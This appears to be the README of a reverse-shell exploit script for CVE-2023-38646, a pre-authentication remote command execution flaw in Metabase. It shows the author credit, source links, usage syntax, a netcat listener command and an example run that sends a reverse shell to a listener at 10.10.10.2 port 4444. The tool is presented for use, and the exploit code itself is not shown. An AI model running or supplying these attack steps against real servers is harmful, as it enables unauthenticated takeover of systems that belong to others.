"This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."
A quick reverse shell exploit script for cve-2023-38646. I did not find this vulnerability, just made the script.
root@box:~/CVE-2023-38646# python3 exploit.py
_______ ________ ___ ___ ___ ____ ____ ___ __ _ _ __
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ |___ \ / _ \ / /| || | / /
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__ _| '_ \
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | (_) | (_) | | | | (_) |
\_____| \/ |______| |____|\___/____|____/ |____/ \___/ \___/ |_| \___/
author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
Usage: python3 exploit.py <url> <local-ip> <local-port>
Run using base url and local IP and port for reverse shell
root@box:~/CVE-2023-38646# nc -lvnp 4444
root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py